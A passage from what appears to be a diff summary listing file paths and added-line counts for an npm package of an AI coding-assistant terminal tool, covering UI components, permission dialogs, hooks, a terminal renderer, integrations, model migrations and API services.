  563. package/src/components/messages/CollapsedReadSearchContent.js +363 -0
  564. package/src/components/messages/CompactBoundaryMessage.js +19 -0
  565. package/src/components/messages/GroupedToolUseContent.js +37 -0
  566. package/src/components/messages/HighlightedThinkingText.js +165 -0
  567. package/src/components/messages/HookProgressMessage.js +111 -0
  568. package/src/components/messages/PlanApprovalMessage.js +213 -0
  569. package/src/components/messages/RateLimitMessage.js +149 -0
  570. package/src/components/messages/ShutdownMessage.js +124 -0
  571. package/src/components/messages/SnipBoundaryMessage.js +7 -0
  572. package/src/components/messages/SystemAPIErrorMessage.js +136 -0
  573. package/src/components/messages/SystemTextMessage.js +842 -0
  574. package/src/components/messages/TaskAssignmentMessage.js +72 -0
  575. package/src/components/messages/UserAgentNotificationMessage.js +78 -0
  576. package/src/components/messages/UserBashInputMessage.js +52 -0
  577. package/src/components/messages/UserBashOutputMessage.js +55 -0
  578. package/src/components/messages/UserChannelMessage.js +130 -0
  579. package/src/components/messages/UserCommandMessage.js +107 -0
  580. package/src/components/messages/UserCrossSessionMessage.js +11 -0
  581. package/src/components/messages/UserForkBoilerplateMessage.js +11 -0
  582. package/src/components/messages/UserGitHubWebhookMessage.js +12 -0
  583. package/src/components/messages/UserImageMessage.js +54 -0
  584. package/src/components/messages/UserLocalCommandOutputMessage.js +170 -0
  585. package/src/components/messages/UserMemoryInputMessage.js +73 -0
  586. package/src/components/messages/UserPlanMessage.js +38 -0
  587. package/src/components/messages/UserPromptMessage.js +63 -0
  588. package/src/components/messages/UserResourceUpdateMessage.js +102 -0
  589. package/src/components/messages/UserTeammateMessage.js +156 -0
  590. package/src/components/messages/UserTextMessage.js +270 -0
  591. package/src/components/messages/UserToolResultMessage/RejectedPlanMessage.js +28 -0
  592. package/src/components/messages/UserToolResultMessage/RejectedToolUseMessage.js +17 -0
  593. package/src/components/messages/UserToolResultMessage/UserToolCanceledMessage.js +17 -0
  594. package/src/components/messages/UserToolResultMessage/UserToolErrorMessage.js +92 -0
  595. package/src/components/messages/UserToolResultMessage/UserToolRejectMessage.js +74 -0
  596. package/src/components/messages/UserToolResultMessage/UserToolResultMessage.js +84 -0
  597. package/src/components/messages/UserToolResultMessage/UserToolSuccessMessage.js +58 -0
  598. package/src/components/messages/UserToolResultMessage/utils.js +43 -0
  599. package/src/components/messages/nullRenderingAttachments.js +58 -0
  600. package/src/components/messages/teamMemCollapsed.js +142 -0
  601. package/src/components/messages/teamMemSaved.js +16 -0
  602. package/src/components/permissions/AskUserQuestionPermissionRequest/AskUserQuestionPermissionRequest.js +659 -0
  603. package/src/components/permissions/AskUserQuestionPermissionRequest/PreviewBox.js +219 -0
  604. package/src/components/permissions/AskUserQuestionPermissionRequest/PreviewQuestionView.js +227 -0
  605. package/src/components/permissions/AskUserQuestionPermissionRequest/QuestionNavigationBar.js +175 -0
  606. package/src/components/permissions/AskUserQuestionPermissionRequest/QuestionView.js +444 -0
  607. package/src/components/permissions/AskUserQuestionPermissionRequest/SubmitQuestionsView.js +137 -0
  608. package/src/components/permissions/AskUserQuestionPermissionRequest/use-multiple-choice-state.js +100 -0
  609. package/src/components/permissions/BashPermissionRequest/BashPermissionRequest.js +404 -0
  610. package/src/components/permissions/BashPermissionRequest/bashToolUseOptions.js +110 -0
  611. package/src/components/permissions/ComputerUseApproval/ComputerUseApproval.js +449 -0
  612. package/src/components/permissions/EnterPlanModePermissionRequest/EnterPlanModePermissionRequest.js +126 -0
  613. package/src/components/permissions/ExitPlanModePermissionRequest/ExitPlanModePermissionRequest.js +653 -0
  614. package/src/components/permissions/FallbackPermissionRequest.js +349 -0
  615. package/src/components/permissions/FileEditPermissionRequest/FileEditPermissionRequest.js +185 -0
  616. package/src/components/permissions/FilePermissionDialog/FilePermissionDialog.js +108 -0
  617. package/src/components/permissions/FilePermissionDialog/ideDiffConfig.js +13 -0
  618. package/src/components/permissions/FilePermissionDialog/permissionOptions.js +137 -0
  619. package/src/components/permissions/FilePermissionDialog/useFilePermissionDialog.js +131 -0
  620. package/src/components/permissions/FilePermissionDialog/usePermissionHandler.js +86 -0
  621. package/src/components/permissions/FileWritePermissionRequest/FileWritePermissionRequest.js +164 -0
  622. package/src/components/permissions/FileWritePermissionRequest/FileWriteToolDiff.js +79 -0
  623. package/src/components/permissions/FilesystemPermissionRequest/FilesystemPermissionRequest.js +113 -0
  624. package/src/components/permissions/MonitorPermissionRequest/MonitorPermissionRequest.js +7 -0
  625. package/src/components/permissions/NotebookEditPermissionRequest/NotebookEditPermissionRequest.js +164 -0
  626. package/src/components/permissions/NotebookEditPermissionRequest/NotebookEditToolDiff.js +218 -0
  627. package/src/components/permissions/PermissionDecisionDebugInfo.js +467 -0
  628. package/src/components/permissions/PermissionDialog.js +55 -0
  629. package/src/components/permissions/PermissionExplanation.js +269 -0
  630. package/src/components/permissions/PermissionPrompt.js +316 -0
  631. package/src/components/permissions/PermissionRequest.js +159 -0
  632. package/src/components/permissions/PermissionRequestTitle.js +58 -0
  633. package/src/components/permissions/PermissionRuleExplanation.js +110 -0
  634. package/src/components/permissions/PowerShellPermissionRequest/PowerShellPermissionRequest.js +178 -0
  635. package/src/components/permissions/PowerShellPermissionRequest/powershellToolUseOptions.js +73 -0
  636. package/src/components/permissions/ReviewArtifactPermissionRequest/ReviewArtifactPermissionRequest.js +7 -0
  637. package/src/components/permissions/SandboxPermissionRequest.js +162 -0
  638. package/src/components/permissions/SedEditPermissionRequest/SedEditPermissionRequest.js +228 -0
  639. package/src/components/permissions/SkillPermissionRequest/SkillPermissionRequest.js +385 -0
  640. package/src/components/permissions/WebFetchPermissionRequest/WebFetchPermissionRequest.js +259 -0
  641. package/src/components/permissions/WorkerBadge.js +44 -0
  642. package/src/components/permissions/WorkerPendingPermission.js +107 -0
  643. package/src/components/permissions/hooks.js +163 -0
  644. package/src/components/permissions/rules/AddPermissionRules.js +171 -0
  645. package/src/components/permissions/rules/AddWorkspaceDirectory.js +335 -0
  646. package/src/components/permissions/rules/PermissionRuleDescription.js +78 -0
  647. package/src/components/permissions/rules/PermissionRuleInput.js +136 -0
  648. package/src/components/permissions/rules/PermissionRuleList.js +1190 -0
  649. package/src/components/permissions/rules/RecentDenialsTab.js +205 -0
  650. package/src/components/permissions/rules/RemoveWorkspaceDirectory.js +103 -0
  651. package/src/components/permissions/rules/WorkspaceTab.js +133 -0
  652. package/src/components/permissions/shellPermissionHelpers.js +112 -0
  653. package/src/components/permissions/useShellPermissionFeedback.js +108 -0
  654. package/src/components/permissions/utils.js +14 -0
  655. package/src/components/sandbox/SandboxConfigTab.js +48 -0
  656. package/src/components/sandbox/SandboxDependenciesTab.js +123 -0
  657. package/src/components/sandbox/SandboxDoctorSection.js +47 -0
  658. package/src/components/sandbox/SandboxOverridesTab.js +193 -0
  659. package/src/components/sandbox/SandboxSettings.js +297 -0
  660. package/src/components/shell/ExpandShellOutputContext.js +33 -0
  661. package/src/components/shell/OutputLine.js +110 -0
  662. package/src/components/shell/ShellProgressMessage.js +144 -0
  663. package/src/components/shell/ShellTimeDisplay.js +72 -0
  664. package/src/components/skills/SkillsMenu.js +239 -0
  665. package/src/components/tasks/AsyncAgentDetailDialog.js +235 -0
  666. package/src/components/tasks/BackgroundTask.js +364 -0
  667. package/src/components/tasks/BackgroundTaskStatus.js +419 -0
  668. package/src/components/tasks/BackgroundTasksDialog.js +494 -0
  669. package/src/components/tasks/DreamDetailDialog.js +251 -0
  670. package/src/components/tasks/InProcessTeammateDetailDialog.js +275 -0
  671. package/src/components/tasks/MonitorMcpDetailDialog.js +7 -0
  672. package/src/components/tasks/RemoteSessionDetailDialog.js +868 -0
  673. package/src/components/tasks/RemoteSessionProgress.js +249 -0
  674. package/src/components/tasks/ShellDetailDialog.js +403 -0
  675. package/src/components/tasks/ShellProgress.js +77 -0
  676. package/src/components/tasks/WorkflowDetailDialog.js +7 -0
  677. package/src/components/tasks/renderToolActivity.js +29 -0
  678. package/src/components/tasks/taskStatusUtils.js +94 -0
  679. package/src/components/teams/TeamStatus.js +77 -0
  680. package/src/components/teams/TeamsDialog.js +673 -0
  681. package/src/components/ui/OrderedList.js +66 -0
  682. package/src/components/ui/OrderedListItem.js +41 -0
  683. package/src/components/ui/TreeSelect.js +300 -0
  684. package/src/components/wizard/WizardDialogLayout.js +48 -0
  685. package/src/components/wizard/WizardNavigationFooter.js +11 -0
  686. package/src/components/wizard/WizardProvider.js +217 -0
  687. package/src/components/wizard/index.js +4 -0
  688. package/src/components/wizard/useWizard.js +9 -0
  689. package/src/constants/apiLimits.js +81 -0
  690. package/src/constants/betas.js +45 -0
  691. package/src/constants/common.js +29 -0
  692. package/src/constants/cyberRiskInstruction.js +23 -0
  693. package/src/constants/errorIds.js +14 -0
  694. package/src/constants/figures.js +38 -0
  695. package/src/constants/files.js +150 -0
  696. package/src/constants/github-app.js +139 -0
  697. package/src/constants/identity.js +112 -0
  698. package/src/constants/keys.js +10 -0
  699. package/src/constants/messages.js +1 -0
  700. package/src/constants/oauth.js +175 -0
  701. package/src/constants/outputStyles.js +162 -0
  702. package/src/constants/product.js +54 -0
  703. package/src/constants/prompts.js +994 -0
  704. package/src/constants/spinnerVerbs.js +98 -0
  705. package/src/constants/system.js +77 -0
  706. package/src/constants/systemPromptSections.js +39 -0
  707. package/src/constants/toolLimits.js +50 -0
  708. package/src/constants/tools.js +103 -0
  709. package/src/constants/turnCompletionVerbs.js +12 -0
  710. package/src/constants/xml.js +73 -0
  711. package/src/context/QueuedMessageContext.js +51 -0
  712. package/src/context/fpsMetrics.js +22 -0
  713. package/src/context/mailbox.js +35 -0
  714. package/src/context/modalContext.js +34 -0
  715. package/src/context/notifications.js +199 -0
  716. package/src/context/overlayContext.js +149 -0
  717. package/src/context/promptOverlayContext.js +118 -0
  718. package/src/context/stats.js +207 -0
  719. package/src/context/voice.js +74 -0
  720. package/src/context.js +146 -0
  721. package/src/coordinator/coordinatorMode.js +345 -0
  722. package/src/coordinator/workerAgent.js +24 -0
  723. package/src/cost-tracker.js +208 -0
  724. package/src/costHook.js +17 -0
  725. package/src/daemon/main.js +19 -0
  726. package/src/dialogLaunchers.js +77 -0
  727. package/src/entrypoints/agentSdkTypes.js +202 -0
  728. package/src/entrypoints/cli.js +226 -0
  729. package/src/entrypoints/init.js +265 -0
  730. package/src/entrypoints/mcp.js +141 -0
  731. package/src/entrypoints/sandboxTypes.js +112 -0
  732. package/src/entrypoints/sdk/controlSchemas.js +452 -0
  733. package/src/entrypoints/sdk/controlTypes.js +1 -0
  734. package/src/entrypoints/sdk/coreSchemas.js +1331 -0
  735. package/src/entrypoints/sdk/coreTypes.generated.js +3 -0
  736. package/src/entrypoints/sdk/coreTypes.js +49 -0
  737. package/src/entrypoints/sdk/runtimeTypes.js +1 -0
  738. package/src/entrypoints/sdk/sdkUtilityTypes.js +1 -0
  739. package/src/entrypoints/sdk/settingsTypes.generated.js +1 -0
  740. package/src/entrypoints/sdk/toolTypes.js +1 -0
  741. package/src/environment-runner/main.js +8 -0
  742. package/src/history.js +386 -0
  743. package/src/hooks/fileSuggestions.js +635 -0
  744. package/src/hooks/notifs/useAntOrgWarningNotification.js +5 -0
  745. package/src/hooks/notifs/useAutoModeUnavailableNotification.js +47 -0
  746. package/src/hooks/notifs/useCanSwitchToExistingSubscription.js +58 -0
  747. package/src/hooks/notifs/useDeprecationWarningNotification.js +43 -0
  748. package/src/hooks/notifs/useFastModeNotification.js +164 -0
  749. package/src/hooks/notifs/useIDEStatusIndicator.js +174 -0
  750. package/src/hooks/notifs/useInstallMessages.js +27 -0
  751. package/src/hooks/notifs/useLspInitializationNotification.js +144 -0
  752. package/src/hooks/notifs/useMcpConnectivityStatus.js +81 -0
  753. package/src/hooks/notifs/useModelMigrationNotifications.js +53 -0
  754. package/src/hooks/notifs/useNpmDeprecationNotification.js +25 -0
  755. package/src/hooks/notifs/usePluginAutoupdateNotification.js +83 -0
  756. package/src/hooks/notifs/usePluginInstallationStatus.js +128 -0
  757. package/src/hooks/notifs/useRateLimitWarningNotification.js +119 -0
  758. package/src/hooks/notifs/useSettingsErrors.js +64 -0
  759. package/src/hooks/notifs/useStartupNotification.js +33 -0
  760. package/src/hooks/notifs/useTeammateShutdownNotification.js +64 -0
  761. package/src/hooks/renderPlaceholder.js +26 -0
  762. package/src/hooks/toolPermission/PermissionContext.js +211 -0
  763. package/src/hooks/toolPermission/handlers/coordinatorHandler.js +44 -0
  764. package/src/hooks/toolPermission/handlers/interactiveHandler.js +397 -0
  765. package/src/hooks/toolPermission/handlers/swarmWorkerHandler.js +108 -0
  766. package/src/hooks/toolPermission/permissionLogging.js +145 -0
  767. package/src/hooks/unifiedSuggestions.js +130 -0
  768. package/src/hooks/useAfterFirstRender.js +12 -0
  769. package/src/hooks/useApiKeyVerification.js +63 -0
  770. package/src/hooks/useArrowKeyHistory.js +203 -0
  771. package/src/hooks/useAssistantHistory.js +193 -0
  772. package/src/hooks/useAwaySummary.js +105 -0
  773. package/src/hooks/useBackgroundTaskNavigation.js +204 -0
  774. package/src/hooks/useBlink.js +28 -0
  775. package/src/hooks/useCanUseTool.js +193 -0
  776. package/src/hooks/useCancelRequest.js +195 -0
  777. package/src/hooks/useChromeExtensionNotification.js +50 -0
  778. package/src/hooks/useClipboardImageHint.js +59 -0
  779. package/src/hooks/useCommandKeybindings.js +87 -0
  780. package/src/hooks/useCommandQueue.js +10 -0
  781. package/src/hooks/useCopyOnSelect.js +88 -0
  782. package/src/hooks/useDeferredHookMessages.js +43 -0
  783. package/src/hooks/useDiffData.js +69 -0
  784. package/src/hooks/useDiffInIDE.js +252 -0
  785. package/src/hooks/useDirectConnect.js +150 -0
  786. package/src/hooks/useDoublePress.js +44 -0
  787. package/src/hooks/useDynamicConfig.js +17 -0
  788. package/src/hooks/useElapsedTime.js +25 -0
  789. package/src/hooks/useExitOnCtrlCD.js +57 -0
  790. package/src/hooks/useExitOnCtrlCDWithKeybindings.js +17 -0
  791. package/src/hooks/useFileHistorySnapshotInit.js +14 -0
  792. package/src/hooks/useGlobalKeybindings.js +213 -0
  793. package/src/hooks/useHistorySearch.js +241 -0
  794. package/src/hooks/useIDEIntegration.js +56 -0
  795. package/src/hooks/useIdeAtMentioned.js +51 -0
  796. package/src/hooks/useIdeConnectionStatus.js +21 -0
  797. package/src/hooks/useIdeLogging.js +29 -0
  798. package/src/hooks/useIdeSelection.js +106 -0
  799. package/src/hooks/useInboxPoller.js +709 -0
  800. package/src/hooks/useInputBuffer.js +73 -0
  801. package/src/hooks/useIssueFlagBanner.js +115 -0
  802. package/src/hooks/useLogMessages.js +98 -0
  803. package/src/hooks/useLspPluginRecommendation.js +176 -0
  804. package/src/hooks/useMailboxBridge.js +15 -0
  805. package/src/hooks/useMainLoopModel.js +25 -0
  806. package/src/hooks/useManagePlugins.js +261 -0
  807. package/src/hooks/useMemoryUsage.js +28 -0
  808. package/src/hooks/useMergedClients.js +11 -0
  809. package/src/hooks/useMergedCommands.js +10 -0
  810. package/src/hooks/useMergedTools.js +32 -0
  811. package/src/hooks/useMinDisplayTime.js +26 -0
  812. package/src/hooks/useNotifyAfterTimeout.js +51 -0
  813. package/src/hooks/useOfficialMarketplaceNotification.js +47 -0
  814. package/src/hooks/usePasteHandler.js +195 -0
  815. package/src/hooks/usePluginRecommendationBase.js +101 -0
  816. package/src/hooks/usePrStatus.js +91 -0
  817. package/src/hooks/usePromptSuggestion.js +128 -0
  818. package/src/hooks/usePromptsFromClaudeInChrome.js +66 -0
  819. package/src/hooks/useQueueProcessor.js +46 -0
  820. package/src/hooks/useRemoteSession.js +431 -0
  821. package/src/hooks/useReplBridge.js +715 -0
  822. package/src/hooks/useSSHSession.js +167 -0
  823. package/src/hooks/useScheduledTasks.js +104 -0
  824. package/src/hooks/useSearchInput.js +302 -0
  825. package/src/hooks/useSessionBackgrounding.js +132 -0
  826. package/src/hooks/useSettings.js +10 -0
  827. package/src/hooks/useSettingsChange.js +13 -0
  828. package/src/hooks/useSkillImprovementSurvey.js +69 -0
  829. package/src/hooks/useSkillsChange.js +51 -0
  830. package/src/hooks/useSwarmInitialization.js +67 -0
  831. package/src/hooks/useSwarmPermissionPoller.js +215 -0
  832. package/src/hooks/useTaskListWatcher.js +157 -0
  833. package/src/hooks/useTasksV2.js +220 -0
  834. package/src/hooks/useTeammateViewAutoExit.js +55 -0
  835. package/src/hooks/useTeleportResume.js +81 -0
  836. package/src/hooks/useTerminalSize.js +9 -0
  837. package/src/hooks/useTextInput.js +397 -0
  838. package/src/hooks/useThaddeusHintRecommendation.js +117 -0
  839. package/src/hooks/useTimeout.js +10 -0
  840. package/src/hooks/useTurnDiffs.js +160 -0
  841. package/src/hooks/useTypeahead.js +1250 -0
  842. package/src/hooks/useUpdateNotification.js +21 -0
  843. package/src/hooks/useVimInput.js +232 -0
  844. package/src/hooks/useVirtualScroll.js +627 -0
  845. package/src/hooks/useVoice.js +952 -0
  846. package/src/hooks/useVoiceEnabled.js +21 -0
  847. package/src/hooks/useVoiceIntegration.js +629 -0
  848. package/src/infrastructure/audit.js +210 -0
  849. package/src/infrastructure/guardrails.js +513 -0
  850. package/src/infrastructure/index.js +11 -0
  851. package/src/ink/Ansi.js +269 -0
  852. package/src/ink/bidi.js +117 -0
  853. package/src/ink/clearTerminal.js +58 -0
  854. package/src/ink/colorize.js +198 -0
  855. package/src/ink/components/AlternateScreen.js +74 -0
  856. package/src/ink/components/App.js +562 -0
  857. package/src/ink/components/AppContext.js +11 -0
  858. package/src/ink/components/Box.js +155 -0
  859. package/src/ink/components/Button.js +166 -0
  860. package/src/ink/components/ClockContext.js +108 -0
  861. package/src/ink/components/CursorDeclarationContext.js +3 -0
  862. package/src/ink/components/ErrorOverview.js +50 -0
  863. package/src/ink/components/Link.js +34 -0
  864. package/src/ink/components/Newline.js +30 -0
  865. package/src/ink/components/NoSelect.js +57 -0
  866. package/src/ink/components/RawAnsi.js +46 -0
  867. package/src/ink/components/ScrollBox.js +171 -0
  868. package/src/ink/components/Spacer.js +20 -0
  869. package/src/ink/components/StdinContext.js +16 -0
  870. package/src/ink/components/TerminalFocusContext.js +45 -0
  871. package/src/ink/components/TerminalSizeContext.js +3 -0
  872. package/src/ink/components/Text.js +195 -0
  873. package/src/ink/constants.js +2 -0
  874. package/src/ink/dom.js +298 -0
  875. package/src/ink/events/click-event.js +36 -0
  876. package/src/ink/events/dispatcher.js +172 -0
  877. package/src/ink/events/emitter.js +31 -0
  878. package/src/ink/events/event-handlers.js +30 -0
  879. package/src/ink/events/event.js +9 -0
  880. package/src/ink/events/focus-event.js +16 -0
  881. package/src/ink/events/input-event.js +161 -0
  882. package/src/ink/events/keyboard-event.js +46 -0
  883. package/src/ink/events/terminal-event.js +78 -0
  884. package/src/ink/events/terminal-focus-event.js +15 -0
  885. package/src/ink/focus.js +158 -0
  886. package/src/ink/frame.js +30 -0
  887. package/src/ink/get-max-width.js +23 -0
  888. package/src/ink/hit-test.js +113 -0
  889. package/src/ink/hooks/use-animation-frame.js +48 -0
  890. package/src/ink/hooks/use-app.js +7 -0
  891. package/src/ink/hooks/use-declared-cursor.js +60 -0
  892. package/src/ink/hooks/use-input.js +70 -0
  893. package/src/ink/hooks/use-interval.js +54 -0
  894. package/src/ink/hooks/use-search-highlight.js +32 -0
  895. package/src/ink/hooks/use-selection.js +60 -0
  896. package/src/ink/hooks/use-stdin.js +7 -0
  897. package/src/ink/hooks/use-tab-status.js +57 -0
  898. package/src/ink/hooks/use-terminal-focus.js +15 -0
  899. package/src/ink/hooks/use-terminal-title.js +29 -0
  900. package/src/ink/hooks/use-terminal-viewport.js +77 -0
  901. package/src/ink/ink.js +1645 -0
  902. package/src/ink/instances.js +7 -0
  903. package/src/ink/layout/engine.js +4 -0
  904. package/src/ink/layout/geometry.js +61 -0
  905. package/src/ink/layout/node.js +62 -0
  906. package/src/ink/layout/yoga.js +237 -0
  907. package/src/ink/line-width-cache.js +19 -0
  908. package/src/ink/log-update.js +583 -0
  909. package/src/ink/measure-element.js +8 -0
  910. package/src/ink/measure-text.js +35 -0
  911. package/src/ink/node-cache.js +30 -0
  912. package/src/ink/optimizer.js +81 -0
  913. package/src/ink/output.js +556 -0
  914. package/src/ink/parse-keypress.js +695 -0
  915. package/src/ink/reconciler.js +384 -0
  916. package/src/ink/render-border.js +134 -0
  917. package/src/ink/render-node-to-output.js +1216 -0
  918. package/src/ink/render-to-screen.js +171 -0
  919. package/src/ink/renderer.js +129 -0
  920. package/src/ink/root.js +80 -0
  921. package/src/ink/screen.js +1132 -0
  922. package/src/ink/searchHighlight.js +78 -0
  923. package/src/ink/selection.js +792 -0
  924. package/src/ink/squash-text-nodes.js +56 -0
  925. package/src/ink/stringWidth.js +200 -0
  926. package/src/ink/styles.js +299 -0
  927. package/src/ink/supports-hyperlinks.js +40 -0
  928. package/src/ink/tabstops.js +39 -0
  929. package/src/ink/terminal-focus-state.js +35 -0
  930. package/src/ink/terminal-querier.js +173 -0
  931. package/src/ink/terminal.js +208 -0
  932. package/src/ink/termio/ansi.js +70 -0
  933. package/src/ink/termio/csi.js +260 -0
  934. package/src/ink/termio/dec.js +53 -0
  935. package/src/ink/termio/esc.js +55 -0
  936. package/src/ink/termio/osc.js +432 -0
  937. package/src/ink/termio/parser.js +356 -0
  938. package/src/ink/termio/sgr.js +292 -0
  939. package/src/ink/termio/tokenize.js +264 -0
  940. package/src/ink/termio/types.js +55 -0
  941. package/src/ink/termio.js +24 -0
  942. package/src/ink/useTerminalNotification.js +57 -0
  943. package/src/ink/warn.js +10 -0
  944. package/src/ink/widest-line.js +14 -0
  945. package/src/ink/wrap-text.js +54 -0
  946. package/src/ink/wrapAnsi.js +6 -0
  947. package/src/ink.js +50 -0
  948. package/src/integrations/credentialStore.js +176 -0
  949. package/src/integrations/index.js +5 -0
  950. package/src/integrations/integrationManager.js +180 -0
  951. package/src/integrations/providers/BaseProvider.js +180 -0
  952. package/src/integrations/providers/GitHubProvider.js +217 -0
  953. package/src/integrations/providers/GmailProvider.js +204 -0
  954. package/src/integrations/providers/GoogleCalendarProvider.js +113 -0
  955. package/src/integrations/providers/HubSpotProvider.js +159 -0
  956. package/src/integrations/providers/JiraProvider.js +216 -0
  957. package/src/integrations/providers/NotionProvider.js +221 -0
  958. package/src/integrations/providers/QuickBooksProvider.js +176 -0
  959. package/src/integrations/providers/SlackProvider.js +174 -0
  960. package/src/integrations/providers/StripeProvider.js +206 -0
  961. package/src/integrations/providers/TwilioProvider.js +239 -0
  962. package/src/integrations/providers/_template.js +112 -0
  963. package/src/integrations/types.js +7 -0
  964. package/src/interactiveHelpers.js +308 -0
  965. package/src/jobs/classifier.js +6 -0
  966. package/src/keybindings/KeybindingContext.js +184 -0
  967. package/src/keybindings/KeybindingProviderSetup.js +259 -0
  968. package/src/keybindings/defaultBindings.js +333 -0
  969. package/src/keybindings/loadUserBindings.js +393 -0
  970. package/src/keybindings/match.js +111 -0
  971. package/src/keybindings/parser.js +184 -0
  972. package/src/keybindings/reservedShortcuts.js +109 -0
  973. package/src/keybindings/resolver.js +182 -0
  974. package/src/keybindings/schema.js +205 -0
  975. package/src/keybindings/shortcutFormat.js +48 -0
  976. package/src/keybindings/template.js +40 -0
  977. package/src/keybindings/useKeybinding.js +161 -0
  978. package/src/keybindings/useShortcutDisplay.js +43 -0
  979. package/src/keybindings/validate.js +395 -0
  980. package/src/main.js +4128 -0
  981. package/src/memdir/findRelevantMemories.js +99 -0
  982. package/src/memdir/memdir.js +406 -0
  983. package/src/memdir/memoryAge.js +52 -0
  984. package/src/memdir/memoryScan.js +65 -0
  985. package/src/memdir/memoryShapeTelemetry.js +8 -0
  986. package/src/memdir/memoryTypes.js +260 -0
  987. package/src/memdir/paths.js +235 -0
  988. package/src/memdir/teamMemPaths.js +261 -0
  989. package/src/memdir/teamMemPrompts.js +82 -0
  990. package/src/migrations/migrateAutoUpdatesToSettings.js +47 -0
  991. package/src/migrations/migrateBypassPermissionsAcceptedToSettings.js +32 -0
  992. package/src/migrations/migrateEnableAllProjectMcpServersToSettings.js +83 -0
  993. package/src/migrations/migrateFennecToOpus.js +39 -0
  994. package/src/migrations/migrateLegacyOpusToCurrent.js +44 -0
  995. package/src/migrations/migrateOpusToOpus1m.js +31 -0
  996. package/src/migrations/migrateReplBridgeEnabledToRemoteControlAtStartup.js +23 -0
  997. package/src/migrations/migrateSonnet1mToSonnet45.js +38 -0
  998. package/src/migrations/migrateSonnet45ToSonnet46.js +48 -0
  999. package/src/migrations/resetAutoModeOptInForDefaultOffer.js +47 -0
  1000. package/src/migrations/resetProToOpusDefault.js +46 -0
  1001. package/src/moreright/useMoreRight.js +13 -0
  1002. package/src/native-ts/color-diff/index.js +819 -0
  1003. package/src/native-ts/file-index/index.js +328 -0
  1004. package/src/native-ts/yoga-layout/enums.js +101 -0
  1005. package/src/native-ts/yoga-layout/index.js +2113 -0
  1006. package/src/outputStyles/loadOutputStylesDir.js +71 -0
  1007. package/src/plugins/builtinPlugins.js +132 -0
  1008. package/src/plugins/bundled/index.js +22 -0
  1009. package/src/proactive/index.js +138 -0
  1010. package/src/proactive/useProactive.js +82 -0
  1011. package/src/projectOnboardingState.js +61 -0
  1012. package/src/query/config.js +17 -0
  1013. package/src/query/deps.js +12 -0
  1014. package/src/query/stopHooks.js +332 -0
  1015. package/src/query/tokenBudget.js +49 -0
  1016. package/src/query.js +1264 -0
  1017. package/src/remote/RemoteSessionManager.js +172 -0
  1018. package/src/remote/SessionsWebSocket.js +308 -0
  1019. package/src/remote/remotePermissionBridge.js +70 -0
  1020. package/src/remote/sdkMessageAdapter.js +227 -0
  1021. package/src/replLauncher.js +7 -0
  1022. package/src/schemas/hooks.js +174 -0
  1023. package/src/screens/Doctor.js +580 -0
  1024. package/src/screens/REPL.js +4500 -0
  1025. package/src/screens/ResumeConversation.js +339 -0
  1026. package/src/self-hosted-runner/main.js +8 -0
  1027. package/src/server/backends/dangerousBackend.js +8 -0
  1028. package/src/server/connectHeadless.js +6 -0
  1029. package/src/server/createDirectConnectSession.js +62 -0
  1030. package/src/server/directConnectManager.js +153 -0
  1031. package/src/server/lockfile.js +11 -0
  1032. package/src/server/parseConnectUrl.js +20 -0
  1033. package/src/server/server.js +12 -0
  1034. package/src/server/serverBanner.js +9 -0
  1035. package/src/server/serverLog.js +11 -0
  1036. package/src/server/sessionManager.js +19 -0
  1037. package/src/server/types.js +7 -0
  1038. package/src/services/AgentSummary/agentSummary.js +147 -0
  1039. package/src/services/MagicDocs/magicDocs.js +193 -0
  1040. package/src/services/MagicDocs/prompts.js +110 -0
  1041. package/src/services/PromptSuggestion/promptSuggestion.js +402 -0
  1042. package/src/services/PromptSuggestion/speculation.js +643 -0
  1043. package/src/services/SessionMemory/prompts.js +254 -0
  1044. package/src/services/SessionMemory/sessionMemory.js +358 -0
  1045. package/src/services/SessionMemory/sessionMemoryUtils.js +157 -0
  1046. package/src/services/analytics/config.js +27 -0
  1047. package/src/services/analytics/datadog.js +26 -0
  1048. package/src/services/analytics/firstPartyEventLogger.js +65 -0
  1049. package/src/services/analytics/firstPartyEventLoggingExporter.js +595 -0
  1050. package/src/services/analytics/growthbook.js +103 -0
  1051. package/src/services/analytics/index.js +91 -0
  1052. package/src/services/analytics/metadata.js +696 -0
  1053. package/src/services/analytics/sink.js +19 -0
  1054. package/src/services/analytics/sinkKillswitch.js +19 -0
  1055. package/src/services/api/adminRequests.js +57 -0
  1056. package/src/services/api/bootstrap.js +118 -0
  1057. package/src/services/api/claude.js +2466 -0
  1058. package/src/services/api/client.js +335 -0
  1059. package/src/services/api/dumpPrompts.js +174 -0
  1060. package/src/services/api/emptyUsage.js +20 -0
  1061. package/src/services/api/errorUtils.js +203 -0
  1062. package/src/services/api/errors.js +926 -0
  1063. package/src/services/api/filesApi.js +523 -0
  1064. package/src/services/api/firstTokenDate.js +49 -0
  1065. package/src/services/api/grove.js +44 -0
  1066. package/src/services/api/logging.js +484 -0
  1067. package/src/services/api/metricsOptOut.js +15 -0
  1068. package/src/services/api/overageCreditGrant.js +123 -0
  1069. package/src/services/api/promptCacheBreakDetection.js +510 -0
  1070. package/src/services/api/referral.js +219 -0
  1071. package/src/services/api/sessionIngress.js +358 -0
  1072. package/src/services/api/ultrareviewQuota.js +29 -0
  1073. package/src/services/api/usage.js +31 -0
  1074. package/src/services/api/withRetry.js +587 -0
  1075. package/src/services/api/xai/anthropic-shim.js +885 -0
  1076. package/src/services/api/xai/brightDataSearch.js +161 -0
  1077. package/src/services/api/xai/thaddeus-engine.js +605 -0
  1078. package/src/services/api/xai/xai-client.js +276 -0
  1079. package/src/services/autoDream/autoDream.js +244 -0
  1080. package/src/services/autoDream/config.js +17 -0
  1081. package/src/services/autoDream/consolidationLock.js +122 -0
  1082. package/src/services/autoDream/consolidationPrompt.js +55 -0
  1083. package/src/services/awaySummary.js +61 -0
  1084. package/src/services/claudeAiLimits.js +331 -0
  1085. package/src/services/claudeAiLimitsHook.js +15 -0
  1086. package/src/services/compact/apiMicrocompact.js +97 -0
  1087. package/src/services/compact/autoCompact.js +234 -0
  1088. package/src/services/compact/cachedMCConfig.js +5 -0
  1089. package/src/services/compact/compact.js +1256 -0
  1090. package/src/services/compact/compactWarningHook.js +12 -0
  1091. package/src/services/compact/compactWarningState.js +15 -0
  1092. package/src/services/compact/grouping.js +58 -0
  1093. package/src/services/compact/microCompact.js +414 -0
  1094. package/src/services/compact/postCompactCleanup.js +70 -0
  1095. package/src/services/compact/prompt.js +325 -0
  1096. package/src/services/compact/reactiveCompact.js +20 -0
  1097. package/src/services/compact/sessionMemoryCompact.js +467 -0
  1098. package/src/services/compact/snipCompact.js +23 -0
  1099. package/src/services/compact/snipProjection.js +11 -0
